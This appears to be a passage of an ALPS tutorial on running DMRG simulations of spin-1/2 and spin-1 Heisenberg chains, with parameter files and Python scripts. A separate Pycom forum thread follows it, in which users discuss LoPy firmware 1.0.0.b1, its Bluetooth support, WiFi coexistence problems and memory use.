very slow increase of the logarithm with its argument, we can ignore it in a first go. Spin-1 Chain For decades, people thought that the spin-1 chain would behave similarly, of course with some quantitative differences due to the different spin lengths. It came as a big surprise in 1982 when Duncan Haldane pointed out that there should be a fundamental difference between isotropic antiferromagnetic Heisenberg chains depending on the length of the spin, namely between half-integer spins ( ) and integer spins ( ), with the difference being most pronounced for small spin lengths. Hence, the spin-1 chain became the focus of strong interest, and in fact DMRG had some of its most important early applications right for this system. Unlike the spin-1/2 chain, the spin-1 chain has no properties that can be calculated exactly by analytical means. We have to rely completely on numerics when it comes to quantitative statements. The ground state energy per site is given by . Again, the question of the existence of a gap is more important, and here one of the big differences to the spin-1/2 chain becomes visible: in the thermodynamic limit, the gap in the spin-1 chain is finite and given by to five-digit accuracy. The question for the behaviour of the spin-spin correlations leads to yet another big difference to the spin-1/2 case. The correlations read asymptotically (i.e. for ) . The dominant contribution is now the exponential decay which happens on a length scale , the correlation length which in this particular case is found numerically to be . There is an analytic (power law) correction by a square root of the distance in the denominator, but this is often neglected in calculations of the correlation length, as it is a slow contribution compared to the fast exponential decay. It would matter, of course, if the correlation length were much larger. The spin-1 chain is therefore a prime example for a non-critical quantum system with finite gap and exponentially decaying correlations. As it will turn out, for DMRG this type of system is much easier to do. Plan Of The Tutorial What we want to achieve in the following tutorial, is to be able to calculate all the above quantities on our own using ALPS DMRG while learning about the principal pitfalls in this numerical project. Vive la difference ... The most important difference to other numerical methods is that DMRG prefers open boundary conditions, such that there are two chain ends at site 1 and , not a closed loop as for example exact diagonalization and most analytical methods would prefer. This was already implicit in the notation of the Hamiltonian above and will lead to some of the more subtle aspects of DMRG calculations. Running The Code General Remarks Before we start, let us briefly discuss the inner logic of the DMRG algorithm without discussing it in full detail. Given a one-dimensional quantum system with local state spaces of dimension , where for spins of length , the Hilbert space dimension explodes exponentially as with system size . Exact diagonalization achieves exact results in this exponentially large Hilbert space, at the price of small system sizes. Quantum Monte Carlo gives approximate results by stochastically sampling this large space, reaching much larger system sizes. The density-matrix renormalization group (DMRG) tries yet another approach, namely to identify very small subspaces of the exponentially large Hilbert space which are hoped to contain good, very good, even excellent approximations to the states of interest such as the ground state. A first key control parameter is therefore , which controls the number of states in the subspace. DMRG is monotonic in this parameter: the larger it is, the larger is the subspace and the better the approximation can be. There is also an exact limit: if , no states are discarded and the solution would be exact. This is however of no practical relevance; if such a large number of states could be achieved on the computer, exact diagonalization is a superior alternative. A remark on notation: given DMRG history, comes under various names, like matrix dimension or number of block states. The second key control parameter is of course system size . The third control parameter(s) can only be understood by looking even closer at the DMRG algorithm. In order to find the best approximation to a state, DMRG proceeds in two steps: - In a first step (so-called infinite-system DMRG) the algorithm tries to find good subspaces by iteratively analyzing chains of length 2, 4, 6, until the desired system size is reached. The procedure consists of splitting the chain in every iteration and insert two new sites at the center; the name comes from the fact that this procedure can of course be carried on infinitely, to take to infinity; but don't expect very meaningful results as you approach infinity! A second remark is that this procedure favours chains of even length for DMRG treatment. - In a second step (so-called finite-system DMRG) DMRG deals with the fact that the subspace selection for shorter chains could not yet take into account all the quantum fluctuations and correlations that would be present in the chain of final length . What the method does, is to go through a series of further iterations to improve the quality of the subspaces. One such iteration looking at all sites of a chain is referred to as a sweep in DMRG. The number of sweeps is the last important control parameter: if it is chosen to small, the precision reachable for a given is not achieved; if it is chosen too large, calculational effort is wasted, although it is of course always good to err on the safe side. In a last remark, let us consider the truncation error, which is a good indicator of the accuracy achieved by a DMRG run. In a simplified perspective, at each point in the algorithm DMRG makes one step in the direction of exponential growth of state space and then asks how much accuracy can be retained if not allowing that step, by means of an analysis of a density matrix regarding the distribution of weights (eigenvalues) corresponding to its eigenstates. The approximations of DMRG are then reflected in the fact that some statistical weight has to be discarded, which is the so-called truncation error. In many DMRG applications, it can be as small as , showing that the approximations made by DMRG are extremely light, which is the reason for the enormous success of the method. For the purpose of the tutorial it is important to know that the error in local quantities (energies, magnetizations, ...) is roughly proportional to (but usually quite a bit larger than) the truncation error, provided we are converged in the number of sweeps. The ALPS DMRG Code and Its Control Parameters Besides inputs such as the Hamiltonian and lattice geometry, the DMRG simulation requires a set of specific control parameters. Some of these are listed below. We refer the user to the DMRG reference page for further details. DMRG-specific parameters NUMBER_EIGENVALUES Number of eigenstates and energies to calculate. Default is 1, should be set to 2 to calculate gaps. SWEEPS Number of DMRG sweeps for the finite-size algorithm. Each sweep involves a left-to-right half-sweep, and a right-to-left half-sweep. NUM_WARMUP_STATES Number of initial states to grow the DMRG blocks. If not specified, the algorithm will use a default value of 20 states. STATES Number of DMRG states kept on each half sweep. The user should specify either 2*SWEEPS different values of STATES or one MAXSTATES or NUMSTATES value. MAXSTATES Maximum number of DMRG states kept. The user may choose to specify either STATES values for each half-sweep, or a MAXSTATES or NUMSTATES that the program will use to grow the basis. The program will automatically determine how many states to use for each sweep, increasing the basis size in steps of STATES/(2*SWEEPS) until reaching MAXSTATES. NUMSTATES Constant number of DMRG states kept for all sweeps. TRUNCATION_ERROR The user can choose to set the tolerance for the simulation, instead of the number of states. The program will automagically determine how many states to keep in order to satisfy this tolerance. Care must be taken, since this could lead to an uncontrollable growth in the basis size, and a crash as a consequence. It is therefore advisable to also specify the maximum number of states as a constraint, using either MAXSTATES or NUMSTATES, as explained before. LANCZOS_TOLERANCE Tolerance for the diagonalization (Davidson/Lanczos) piece of the code. the default value is 10^-7. CONSERVED_QUANTUMNUMBERS Quantum numbers conserved by the model of interest. They will be used in the code in order to reduce matrices in block form. If no value is specified for a particular quantum number, the program will work in the grand canonical. For instance in spin chains if you do not declare Sz_total, the program will run using a Hilbert space with dim=2^N states. Running in the "canonical" (by setting Sz_total=0, for instance) will improve performance considerably by working in a subspace with a reduced dimension. For an example of how to do this, take a look at the parms file included with the dmrg code. How to choose the right parameters It is not recommendable to use the default input values. DMRG convergence is strongly affected by the number of states used in the warmup, the number of sweeps, and the maximum number of states kept. Good practice involves looking at the convergence of the ground-state energy and truncation error as a function of the number of states. This will indicate an optimal number of states to be kept in order to maintain the errors below certain tolerance. In order to determine if enough sweeps have been performed, it is recommendable to look at the spatial distribution of the correlations, or local quantities such as the Sz projection of the spin, or the particle density. For instance, in a model that is symmetric under reflections, we should expect that these observables will also be symmetric. Another quantity that should be symmetric is the entanglement entropy. If this behavior is not reflected in the results, it is likely that this is due to running not enough sweeps (another plausible scenario is phase separation). If the Hamiltonian preserves quantum numbers, such as Sz or N, it is then possible to fix these values to run the simulation in a subspace of reduced dimension. This results in much faster runs, and optimal memory usage. Ground State Energies The first question we usually ask is for the ground state and its energy . Here we have to distinguish two cases. First, we might be interested in the ground state energy for a given Hamiltonian on a chain of a given length . Secondly, we might be interested in the energy per site (or per bond) in the thermodynamic limit. Fixed Length Ground State Energies Consider chains of length . Both for spin-1/2 and spin-1, set up ground state energy calculations for numbers of states . For each length, tabulate the truncation error and the ground state energies as a function of . Experiment carefully with the number of sweeps to assure that for a given length and number of states your result is actually converged. - For each system length and spin length, try to establish the connection between the accuracy of the total energy and the truncation error by plotting total energy vs. truncation error. - Observe how the convergence in deteriorates with length for spin-1/2 and spin-1. Apart from a global factor of order of the length, do you see a difference between the convergence behaviour in the two cases? Hint: What you should see is, that but for the global factor, the convergence for large system sizes is only weakly dependent of length for the spin-1 chain, but much more strongly dependent for the spin-1/2 chain. This is because the spin-1 chain physics is dominated by segments of length of the correlation length, whereas for the spin-1/2 chain there is no finite length scale because of criticality. - Try to extrapolate ground state energies for each chain length to the limit. The one dimensional S=1/2 Heisenberg chain Single run The first example consists of setting up a simulation for a spin-1/2 Heisenberg chain with 32 sites, and open boundary conditions, keeping 100 states. Using parameter files The parameter file spin_one_half sets the most important parameters. LATTICE="open chain lattice" MODEL="spin" CONSERVED_QUANTUMNUMBERS="N,Sz" Sz_total=0 J=1 SWEEPS=4 NUMBER_EIGENVALUES=1 L=32 {MAXSTATES=100} Using the following sequence of commands you can first convert the input parameters to XML and then run the application dmrg: parameter2xml spin_one_half dmrg --write-xml spin_one_half.in.xml The output file spin_one_half.task1.out.xml contains all the computed quantities and can be viewed with a standard internet browser. DMRG will perform four sweeps, (four half-sweps from left to right and four half-sweeps from right to left) growing the basis in steps of MAXSTATES/(2*SWEEPS) until reaching the MAXSTATES=100 value we have declared. This is a convenient default option, but the number of states can be customized, as we show in the spin S=1 example below. Using Python To set up and run the simulation in Python we use the script spin_one_half.py. The first parts of this script imports the required modules, prepares the input files as a list of Python dictionaries, writes the input files and runs the application. import pyalps import numpy as np import matplotlib.pyplot as plt import pyalps.plot parms = [ { 'LATTICE' : "open chain lattice", 'MODEL' : "spin", 'CONSERVED_QUANTUMNUMBERS' : 'N,Sz', 'Sz_total' : 0, 'J' : 1, 'SWEEPS' : 4, 'NUMBER_EIGENVALUES' : 1, 'L' : 32, 'MAXSTATES' : 100 } ] input_file = pyalps.writeInputFiles('parm_spin_one_half',parms) res = pyalps.runApplication('dmrg',input_file,writexml=True) To run this, launch your python interpreter using the convenience scripts alpspython or vispython. We now have the same output files as in the command line version. Next, we load the properties of the ground state measured by the DMRG code data = pyalps.loadEigenstateMeasurements(pyalps.getResultFiles(prefix='parm_spin_one_half')) and print them to the command line. for s in data[0]: print s.props['observable'], ' : ', s.y[0] Additionally, we can load detailed data for each iteration step iter = pyalps.loadMeasurements(pyalps.getResultFiles(prefix='parm_spin_one_half'), what=['Iteration Energy','Iteration Truncation Error']) allowing us to look at how the DMRG algorithm converged to the final results. plt.figure() pyalps.pyplot.plot(iter[0][0]) plt.title('Iteration history of ground state energy (S=1/2)') plt.ylim(-15,0) plt.ylabel('$E_0$') plt.xlabel('iteration') plt.figure() pyalps.plot.plot(iter[0][1]) plt.title('Iteration history of truncation error (S=1/2)') plt.yscale('log') plt.ylabel('error') plt.xlabel('iteration') plt.show() Using Vistrails To run the simulation in Vistrails, open the file dmrg-01-dmrg.vt and select the workflow labeled "spin 1/2 iterations". Multiple runs Using parameter files We now proceed to illustrate how to setup several runs in a single parameter file spin_one_half_multiple. We shall use the example proposed in the tutorial, and simulate a chain of length L=32, changing the number of DMRG states (we shall use a smaller number of states for illustration purposes): LATTICE="open chain lattice" CONSERVED_QUANTUMNUMBERS="N,Sz" MODEL="spin" Sz_total=0 J=1 NUMBER_EIGENVALUES=1 SWEEPS=4 L=32 { MAXSTATES=20 } { MAXSTATES=40 } { MAXSTATES=60 } As we can see, the main difference with the previous example consists in the parameters encoded in brackets. As before, we run: parameter2xml spin_one_half_multiple dmrg --write-xml spin_one_half_multiple.in.xml In this case, we will find five output files spin_one_half_multiple.task#.out.xml containing the results. Using Python The script spin_one_half_multiple.py sets up three Python dictionaries of parameters with differing MAXSTATES parms= [] for m in [20,40,60]: parms.append({ 'LATTICE' : "open chain lattice", 'MODEL' : "spin", 'CONSERVED_QUANTUMNUMBERS' : 'N,Sz', 'Sz_total' : 0, 'J' : 1, 'SWEEPS' : 4, 'NUMBER_EIGENVALUES' : 1, 'L' : 32, 'MAXSTATES' : m }) After writing parameter files, running the dmrg application and loading the results in the same way as for the single run above, we can print the measurements from all runs. for run in data: for s in run: print s.props['observable'], ' : ', s.y[0] Using Vistrails In the same dmrg-01-dmrg.vt file as above select the workflow "spin 1/2 multiple" from the history view. The one dimensional S=1 Heisenberg chain The S=1 Heisenberg chain will require some special treatment due to the open boundary conditions. As explained above, we need to include two sites at both ends of the chain with a spin S=1/2 on each of them. This requires defining a new lattice file for the simulation. As it turns out, there is not a straightforward way to do this, so we will have to do it manually. To simplify the process, we have included a simple Python script build_lattice.py that will generate the lattice for us. The only input is the number of sites in the lattice. For instance, by typing $ alpspython build_lattice.py 6 we shall obtain the output <LATTICES> <GRAPH name = "open chain lattice with special edges" dimension="1" vertices="6" edges="5"> <VERTEX id="1" type="0"><COORDINATE>0</COORDINATE></VERTEX> <VERTEX id="2" type="1"><COORDINATE>2</COORDINATE></VERTEX> <VERTEX id="3" type="1"><COORDINATE>3</COORDINATE></VERTEX> <VERTEX id="4" type="1"><COORDINATE>4</COORDINATE></VERTEX> <VERTEX id="5" type="1"><COORDINATE>5</COORDINATE></VERTEX> <VERTEX id="6" type="0"><COORDINATE>6</COORDINATE></VERTEX> <EDGE source="1" target="2" id="1" type="0" vector="1"/> <EDGE source="2" target="3" id="2" type="0" vector="1"/> <EDGE source="3" target="4" id="3" type="0" vector="1"/> <EDGE source="4" target="5" id="4" type="0" vector="1"/> <EDGE source="5" target="6" id="5" type="0" vector="1"/> </GRAPH> </LATTICES> As we can see, the lattice is defined as a one-dimensional graph that contains six vertices, and edges connecting nearest neighbors. The first and last vertices are of type "0", while the others are of type "1". We shall use this definition to implement the model on top of this lattice, which should contain information about the degrees of freedom living on these vertices. The way to do this is by specifying the parameters: local_S0=0.5 local_S1=1 To run a lattice with 32 sites we shall then type $ alpspython build_lattice.py 32 > my_lattice.xml Using parameter files Let us see how the final parameter file spin_one should look like: Clearly, it will result cumbersome to repeat this process for each system size. One way to simplify it even further is to write a script to do it for us automatically. A simpler one is to define all the lattices we need in a lattice library. We have included a my_lattices.xml file with lattices of sizes . All we have to do is modify the previous parameter file by replacing the lattice definition as follows: LATTICE_LIBRARY="my_lattices.xml" LATTICE="open chain lattice with special edges 32" where we have included the lattice size in the name. Using Python The script spin_one.py defines the parameters in a Python dictionary. parms = [ { } ] Apart from parameter and file name changes, it is the same as the spin_one_half.py script explained above. Using Vistrails Select the workflow "spin 1 iterations" from the history view in the file dmrg-01-dmrg.vt. Multiple runs Using parameter files Same as for the spin S=1/2 case, we can now setup multiple runs in a single parameter file as follows: LATTICE_LIBRARY="my_lattices.xml" LATTICE="open chain lattice with special edges 32" MODEL="spin" local_S0=0.5 local_S1=1 CONSERVED_QUANTUMNUMBERS="N,Sz" Sz_total=0 J=1 NUMBER_EIGENVALUES=1 SWEEPS=4 { MAXSTATES=20 } { MAXSTATES=40 } { MAXSTATES=60 } Using Python The same runs can be set up with the script spin_one_multiple.py, which can be obtained from the corresponding spin 1/2 script by replacing the parameters. Using Vistrails Select the workflow "spin 1 multiple" from the history view in the file dmrg-01-dmrg.vt. Ground State Energies Per Site (Bond) If we look closely at the Hamiltonian, the energy of a chain of length does not sit on the sites, but on the bonds. A first (naive) attempt therefore consists in taking the results of the last simulations and calculating . Do you get really close to the values listed in the introduction? What is the wrong underlying assumption? The correct way is to eliminate the effect of the open boundary conditions by considering the energy of one bond at the center of the chain. There are two ways of doing it. - Calculate the ground state energy of two chains of length and , again for the lengths already mentioned above, and calculate as the energy per bond. What do the results look like now? - The less costly and usual way would be to use correlators (as discussed further below, so postpone this exercise until then) between neighbouring sites and use for sites at the chain center.
http://alps.comp-phys.org/mediawiki/index.php?title=ALPS_2_Tutorials:DMRG-01_DMRG&diff=prev&oldid=4302
CC-MAIN-2020-05
refinedweb
3,886
52.09
I am trying to get a new installation of Arch on an IBM T43 laptop working. I have identified my wireless interface, however I am getting some very odd results. "iw dev wlp11s2 scan" returns command failed: Operation not supported (-95). Investigating this, I ran "dmesg | grep wlp11s2" which returns: [ 6.620806] systemd-udevd[127]: renamed network interface eth1 to wlp11s2 Anyhow, I have no idea how my interaces wound up crosswired, and don't know how to correct this issue. Last edited by WanderingOak (2014-02-06 03:29:30) Offline Please google persistent network interface naming. This change happened a few months back, and on these forums alone there should be a plethora of information. Offline Well, I've researched the issue and thought I had it licked, but I still can't get it to work. In /etc/udev/rules.d I created a file (as root) called 70-persistent-net.rules. In the file, is: SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="00:16:41:a7:fa:01", NAME="enp2s0" SUBSYSTEM=="net", ACTION=="add", ATTR{address}=="00:16:6f:b2:32:91", NAME="wlp11s2" I know that the mac accress is right, and I know that the device name is right. However, even after a reboot, I still have "renamed network interface eth0 to wlp11s2". I tried the exact same thing in /etc/udev/rules.d/10-network.rules, bit it still won't work. Any ideas as to what I am doing wrong? Offline In post #1, you said eth0, in post #3, you said eth1. Perhaps you fixed it. Have you re-tried your iw dev command? Nothing is too wonderful to be true, if it be consistent with the laws of nature -- Michael Faraday You assume people are rational and influenced by evidence. You must not work with the public much. -- Trilby ---- How to Ask Questions the Smart Way Online There are some wireless drivers that use the eth* namespace for whatever reason. I have a broadcom card for which I have to use broadcom-wl. I have patched it to use wlan* (just in case it doesn't get renamed, which happens sometimes), but originally it is set to use eth*. Offline iw dev wlp11s2 scan still returns: command failed: Operation not supported (-95) Offline I've tried changing the permissions of the udev.rules files. Does the ownership matter? I've tried commenting out the 70-persistent-net.rules file (since it was created first), but that didn't work either. any more ideas? Offline I changed the names of the interfaces in /etc/udev/rules.d/10-network.rules, and now dmesg | grep net0 (net0 being the wifi interface) returns: [ 6.603510] systemd-udevd[120]: renamed network interface eth1 to net0 I have to say that I am running out of ideas. Offline I don't know what that last post is asking. It would seem as though you have achieved a successful interface rename from using 10-network.rules. What is the problem with that? Offline I don't know what that last post is asking. It would seem as though you have achieved a successful interface rename from using 10-network.rules. What is the problem with that? I have exactly the same problem that I had before, only the name of my wifi interface has changed. I first noticed this problem after installation, when my ethernet interface was renamed to my wifi interface. Yes, I did manage to change the name of my wifi interface. However, my ethernet interface is still being renamed to my wifi interface only it is now being renamed to the new name. iw dev net0 scan still returns: command failed: Operation not supported (-95) Offline The odd thing is that ip link returns the new names that I gave to my ethernet and wifi interfaces. However, dmesg | grep wifi1 mentions eth1, which is an interface name that I did not create: [ 6.124178] systemd-udevd[123]: renamed network interface eth1 to wifi1 Offline The interface eth(x) changes back and forth from eth0 to eth1 during each boot. Offline I am still trying to figure this out. Right now, my mystery interface is eth0. dmesg | grep eth0 returns the following [] [ 6.523660] systemd-udevd[121]: renamed network interface eth0 to lan-1 [ 6.574364] systemd-udevd[118]: renamed network interface eth0 to wan-1 The MAC address for the Tigon3 is the same as the MAC address for my wifi. When I run "lspci | grep Tigon3" I do not get any results. According to lspci, my wireless is: Intel Corporation PRO/Wireless 2200BG [Calexico2]. So, it looks like I will have to either remove or blacklist the Tigon3 module. Am I on the right track? Offline The deeper I dig, the more confused I get. lsmod does not return anything about a Tigon3 module, yet dmesg is full of messages about it. dmesg | grep tg3 returns: [ 5.517289] tg3.c:v3.133 (Jul 29, 2013) [] [ 12.865555] tg3 0000:02:00.0 lan-1: Link is up at 100 Mbps, full duplex [ 12.865573] tg3 0000:02:00.0 lan-1: Flow control is off for TX and off for RX [84762.590937] tg3 0000:02:00.0 lan-1: Link is down [84774.594463] tg3 0000:02:00.0 lan-1: Link is up at 100 Mbps, full duplex [84774.594484] tg3 0000:02:00.0 lan-1: Flow control is off for TX and off for RX lsmod | grep tg3 doesn't return anything. Any ideas? Am I running down a blind alley, or am I heading in the right direction? Last edited by WanderingOak (2014-01-29 11:59:13) Offline This installation was installed from an older ISO, dated October 29th, 2012. I am not sure of the Arch version naming structure, or even if it has one. Anyhow, since I am having such a hassle with this installation, I am starting to wonder if it might be a good idea to just start over from scratch with a current ISO. Yes, the challange of un-buggering my current installatoin of Arch linux has it's appeal. However, my end goal is to have a functioning laptop that works the way I want it to (rather than be forced to deal with Ubuntu Unity as a worst-case example(the only thing worse would be Windows 8)), not to spend all of my time trying to get the blasted contraption to work. So, am I too borked to fix, or do I still have hope? Offline So many issues; where to begin? I was curious about your plight (and I like your spunk about not giving up) so I fired up my ancient T43 to see what it's crusty (but trusty) circuits would do with this. # iw dev wlp4s2 scan command failed: Operation not supported (-95) In fact, almost all of the iw commands borked on that old Intel Corporation PRO/Wireless 2200BG wireless chip. I had just finished a git pull on Linus' kernel, so I went to the fresh source code and found this in drivers/net/wireless/ipw2x00/libipw_module.c: static struct cfg80211_ops libipw_config_ops = { }; So it appears, just like the Linux Wireless web page says ( … on/nl80211)... that nl80211 and cfg80211 are still under development. Further conformation comes from the Kconfig file where it specifies CONFIG_CFG80211_WEXT for the IPW2200 module ( … n/cfg80211). Not much of a surprise that this new fangled method using iw hasn't been ported to this ancient wireless driver since it doesn't get much love anymore. However, the old tired but true wireless_tools package still works like a champ here, so I strongly suggest you give that a shot. As for that Tigon3: # lspci -k -s 02:00.0 02:00.0 Ethernet controller: Broadcom Corporation NetXtreme BCM5751M Gigabit Ethernet PCI Express (rev 11) Subsystem: IBM ThinkPad Z60t Kernel driver in use: tg3 Kernel modules: tg3 It indeed uses the tg3 module (but this got the "Subsystem" totally wrong). And that module is loaded on my T43: # lsmod|grep tg3 tg3 141438 0 ptp 6876 1 tg3 libphy 17529 1 tg3 But this is the wired ethernet, so I'm not sure what problem you're trying to solve messing with that. I assume you don't like the goofy name. Me, I let them change it to their funny names (they must have been trying to solve a problem I didn't have), and simply installed wicd because it just works. But I'll be the first to admit that it's sometimes fun to twiddle with things. tldr; Suggestion... Remove all your changes. Then install wicd and possibly the wireless_tools package(s). Remove and/or unconfigure anything else touching the network devices (Example: netctl... pay special attention to systemd here, or may the god's forbid, Gnome's Network Manager which is a pox upon us), and then configure wicd (using the strange device names). At least that's what works for me on my T43 running Arch for the last umpteen years. Last edited by pigiron (2014-02-01 09:00:40) Offline However, the wireless_tools package still works like a champ here, so I strongly suggest you give that a shot. On the [arch-releng] mailing list recently the idea of dropping wireless_tools from the Archiso was brought up. It was ultimately shot down because there are still a few devices out there that are still not compatible with iw. I am fairly certain that the example that came up was in fact the hardware that uses the ipw2220-fw package. Offline Well, apparently wicd worked, because I am now connected wirelessly. As far as ipw2200-fw, I was able to download it but I am not sure if it is loaded, as it does not show up under dmesg or lsmod. modprobe ipw2200-fw returns modprobe: FATAL: Module ipw2200-fw not found. Offline Apparently I still have issues. On boot, wicd asks me for my password so it can access my network cards. I then get an error message: "Failed to run /usr/bin/wicd as root. The underlying authorization mechansim (sudo) does not allow you to run this program. Contact your system administrator." When I click through that message, I get the following error message: "Could not connect to wicd's D-Bus interface. Check the wick log for error messages" If I try to start wicd manually, I get the above error messages twice, plus the following message once (the second time): "Error connecting to wicd service via D-bus. Please ensure that the wicd service is running" Those messages went away when I edited my sudoers file to allow the wheel group access without a password. Then I was able to launch wicd manually, and see my wireless networks, but I still could not connect. I rebooted, only to see the following message after starting x: "The wicd demon has shut down. The UI will not function properly until it is restarted" I do not see the above error message when starting wicd manually. However, even though I can see my local wifi networks, I am still unable to connect. It goes through the motions (validating authentication, connecting), and then says 'not connected'. The wicd logs do not provide any help. I am running Xfce as my Desktop Environment. Offline How are you trying to start the wicd daemon? It sounds as though you have just set it up to be run a login by your DE. You need to start/enable the service. Offline I had wicd-gtk --tray set up to run automaticly on boot. I added wicd, and now I do not get any error messages on boot. I am able to see all of the wifi networks that are available to me. However, I am still unable to connect. My latest attempt to connect to my wifi was logged as: 2014/02/04 17:08:26 :: Connecting to wireless network belkin.b7c 2014/02/04 17:08:26 :: Putting interface down 2014/02/04 17:08:26 :: Releasing DHCP leases... 2014/02/04 17:08:27 :: Setting false IP... 2014/02/04 17:08:27 :: Stopping wpa_supplicant 2014/02/04 17:08:27 :: Flushing the routing table... 2014/02/04 17:08:27 :: Putting interface up... 2014/02/04 17:08:29 :: Generating psk... 2014/02/04 17:08:29 :: Attempting to authenticate... 2014/02/04 17:08:30 :: Running DHCP with hostname archlaptop 2014/02/04 17:08:30 :: dhcpcd[1329]: sending commands to master dhcpcd process 2014/02/04 17:08:30 :: 2014/02/04 17:08:30 :: 2014/02/04 17:08:30 :: DHCP connection successful 2014/02/04 17:08:30 :: not verifying 2014/02/04 17:08:30 :: Connecting thread exiting. 2014/02/04 17:08:30 :: Sending connection attempt result success I am able to verify that my wifi is functioning. Both my ipod and blu-ray player can connect without any issues. Offline Please use proper quote and code tags. What did you add wicd to? How are you starting wicd? It is not meant to just be called from the window manager's autostart system. It is meant to be run as a system service (via systemd). Offline Okay, I ran "systemctl enable wicd", and I am still unable to connect wirelessly. "systemctl | grep wicd" returns: wicd.service loaded active running Wicd a wireless and wired network manager for Linux I removed wicd from the autostart system and rebooted, but still no luck. Offline Do you have conflicting network management services? You can only have one at a time. Offline I ran "systemctl --type=service" to see if any other network management services aside from wicd were running. I didn't see anything, but I remembered instaling networkmanager, so I removed it with pacman. I am still unable to connect wirelessly. Offline
https://bbs.archlinux.org/viewtopic.php?id=175899
CC-MAIN-2017-22
refinedweb
2,322
73.78
New firmware release 1.0.0.b1 Hello everyone, Firmware 1.0.0.b1 has just been released. These are the notes from the change log: - Add bind method to LoRa sockets. This allows to specify a port number different than the default of 2. - Add the Bluetooth network class with WiFi co-existence. - Refactor the LoRa module to use event groups. - Update to the latest IDF from Espressif - Only try to send via LoRaWAN if the network is joined. - Avoid glitches when configuring pins. - Add support for SHA-224 - Allow to pass a manual DEV_EUI during LoRa OTAA join. The most important feature here is that we have added BLE support, it's very basic for now, but we will now be able to start adding more features in the next releases. For details check the docs: As usual the updater tools for the new firmware can be downloaded from: (Under Firmware Updates) Cheers, Daniel @livius regarding your problem trying to connect 2 WiPy's together, please check my reply in: Thanks. Cheers, Daniel Hi Mophor, we'll check this issue immediately and if there's a problem when performing a WiFi scan after a BLE scan then we'll fix it. Coexistence is happening for sure, you can check it by enabling BLE and doing the scan from telnet when being connected to the LoPy in AP mode. The memory being overwritten is OK, that portion of memory is already reserved for BLE usage. Cheers, Daniel @robert-hh @daniel If we end using LoPy for a project / class, it'd be great to have students build the whole thing, even if just once. Many had never installed an OS before working with a Pi. - jmarcelino last edited by jmarcelino @bmarkus This is a common question with the ESP32 - see the long discussion at ESP32 specs list RAM as one big block (400KB! 540KB!) however that's not really all available to applications - at least not in a simple way. The ESP-IDF (the "core" SDK of the ESP32) is also not currently optimised for memory. From that thread the "official answer" is: We indeed will be working on minimizing esp-idf RAM usage at a certain ? point in time; for now, we think it's more important to get all features in first. Once the ESP-IDF reaches feature stability and they start look into memory improvements I'd expect those savings will translate into *Py environment as well With each firmware update we get less and less free RAM. Now it is only 51k. During KickStarter campaign I got the impression to get much more free RAM. Seems that new features eat up memory. Does it mean that at the end of the road with working LoRa stack, BT and so on there will be no RAM available, or RAM availablity limits the introduction of new or missing features? Hope it is not the case. Would appreciate an explanation how RAM is used by the system. Hello Daniel, this is a big improvement. Would you mind to update the github repository, such that I can enable support of .mpy files? Robert @daniel In this release note you have mentioned WiFi and BLE Coexistence, I have tried a very simple REPL script to check if that's true and I'm sorry to say I have found it's not! I have tried importing BLE first like this: from network import Bluetooth ble = Bluetooth() # Heartbeat LED turns constant blue. ble.scan() # outputs a few bluetooth devices in 10 secs from network import WLAN wifi = WLAN(mode = WLAN.STA) wifi.scan() # REPL won't give back the control and it never finishes the task This is a little different if the order was reversed: from network import WLAN wifi = WLAN(mode = WLAN.STA) wifi.scan() # Outputs list of WiFi devices very fast from network import Bluetooth ble = Bluetooth() ble.scan() # Outputs a list of BLE devices in 10 seconds. wifi.scan() # Won't return the control in ever. So, in essence, yeah, there is no co existence, even for the simple scanfunctionality! This means if Bluetoothis imported, WLAN won't work. I have tested the Scan functionality for both but that's bad enough for my scenario. Any comments? Update: It seems vital to mention that from the looks of it, instantiating Bluetoothoverwrites memory like this: from network import Bluetooh(): ..:..:..:..:..:.. is that a right assessment? @pipomolo I have faced the same issue last week. My problem was related to installed FTDI drivers. Have you tried to install FTDI drivers on your mac? if so, you need to remove one of them and leave just one acting driver live. You can find more info on related FTDI driver's page info: @daniel Hi Daniel, i have just tried to upgrade my 3 LoPy recently received, with the latest firmware here, and after installing the PyMaker (which works with the actual version of the LoPy) and then trying with the PyCom firmware Updade software, on an iMac, connected with USB cable (and selecting the /dev/cu.Bluetooth-Incoming-Port for Serial), i face the sameproblem. Failed. It seems there is an issue with the serial / USB driver ? I have tried with a MacBookPro also, and i face the same issue. I use the same interface and cable to program my Arduino without issues. i have tried also to change the speed (9600, 19200) in the .py file related, but no luck. thanks for pointing me to a relevant doc or tool. - jmarcelino last edited by @brotherdust said in New firmware release 1.0.0.b1: One thought that occurs to me: what are other MP boards doing for BT (the BBC:micro comes to mind)? Isn't it more pythonic to not reinvent the wheel? The particular Nordic part used in the micro:bit didn't have enough RAM (16K) to run both MicroPython and the BLE stack so they never implemented it. They only support wired (!) networking and a simple proprietary radio protocol from Nordic. So here we have a chance to be true pioneers. - brotherdust last edited by One thought that occurs to me: what are other MP boards doing for BT (the BBC:micro comes to mind)? Isn't it more pythonic to not reinvent the wheel? - jmarcelino last edited by @daniel The cb (CoreBluetooth) module in Pythonista could give some inspiration as well - brotherdust last edited by @jasonriedy I've been keeping an eye on the implementation status of the ULP coprocesssor functions in the upstream espressif-idf repository. Espressif has been making progress on it, but it doesn't seem like it's ready yet. Pycom did mention they updated their downstream idf repo, which means the ULP functions are present in C; but I didn't see any mention of ULP functions for MicroPython yet. Likely we will see it in them in the near future. For those interested, I'd strongly suggest occasionally reviewing the commit log on the upstream espressif-idf. It's pretty fun to watch! @daniel I suggest you take a look at CurieBLE's API as well (). It's related to Intel's IoT enabled MCU you can find on Arduino/Genuino 101. I have used it for a BLE project and it did the job quite beautifully. @daniel They're hive sensors from Broodminder. The sensor pipes up every few seconds, but we likely only need the measurements every 10-15 minutes. Assuming that dropping to low power / standby during that time can be made to work... Otherwise might just gather all the data but only send it every longish time. The actual processing is minimal. We just need to re-arrange the bytes into a packet to send of to TTN. Reinstalling the installer app every time is a bit annoying. Is it possible to have a direct link to a firmware file on the web site? Or at least please make OTA-version, that does not require install. PS: I've updated the last firmware, machine.freq() is 160MHz now instead of 80. Magic :) @jasonriedy and @jmarcelino I think you both have very good ideas around what the BLE API should look like. I'd love to hear your suggestions around that. We have also been looking and bluepy for inspiration. Cheers, Daniel @jasonriedy right now the scan function only provides a list of the devices advertising in the neighborhood, so it makes sense to see only one entry in your tests. The next step (and it's what we will release soon) is to subscribe to a given device and get each of the advertisements messages that it sends. Cheers, Daniel
https://forum.pycom.io/topic/373/new-firmware-release-1-0-0-b1
CC-MAIN-2022-33
refinedweb
1,445
72.76
